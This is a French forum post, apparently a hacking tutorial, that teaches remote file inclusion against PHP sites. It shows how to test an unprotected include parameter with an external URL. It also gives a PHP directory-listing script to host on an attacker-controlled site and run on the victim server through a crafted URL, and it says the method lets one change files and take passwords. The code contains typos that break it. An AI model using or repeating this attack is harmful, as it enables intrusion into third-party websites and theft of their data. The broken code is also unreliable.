AdMiniStraTeur
CyberHeX
Localisation : ANYWARE
Messages : 28
Inscrit le: : 01/04/2010
 |  Sujet: Hacker un site par HTTP  Dim 11 Avr - 5:58 | |
| Hacker un site par HTTP
voici un petit tutoriel qui t'apprend comment pirater des site web
(php)
Si tu pouvait utiliser
du PHP librement sur un site,
tu pourais le hacker et en faire ce que tu
veux.
Et pour
certains sites, c'est impossible!
si tu vois que l'adresse d'une page d'un site
est du genre http://www.Cyberforum.com/page.php?ppage=news.php par exemple (ou http://www.site.com/?url=news.php ...etc), ça signifie que la page index inclu la
page news.php pour l'affichager.certain webmasters ont oublié de protegé
cet include,ce qui fait que tu peux include n'importe quelle page!!!
Pour en etre sur essai ça:
http:// www.site.com/page.php?page=http://www.google.com (ne pas oublier le http://)
Si la page
d'accueil de google s'affiche dans le site,c'est que tu as reussi!!!!
Maitenant,tu peux modifier les
fichiers, en crée, recuperer des mots de passe du site en question!
Pour afficher tous les noms de
fichiers du site (tres utile pour savoir ou se trouve l'admin...etc),
crée un fichier avec le code php sur ton compte:
function scann($rep){$dir=opendir($rep);
while($file=readdir($dir))
{
if(is_dir("$rep/$file")&&$file!="."&&$file!=".")
{
scann("$rep/$file");
}
else{
echo "$rep/$file
}
}
}
sacnn(".");
?>
Une fois ce script sur ton compte (http://www.toncompte.com/hack.txt), tu peux faire exécuter par le serveur victime
comme ceci:
http://www.site.com/page.php?page=http://www.toncompe.com/hack.txt
Ton fichier ne doit etre en
*.php, comme le disent la plupart des sites, sinon il sera executé sur
ton serveur avant d'etre afficheé par le serveur victime, ce qui
reviendrait à piraté ton site!!!!!
Et voila!Les
noms de tous les fichiers du site www.site.com
son affichés sur ton écran. | |
|
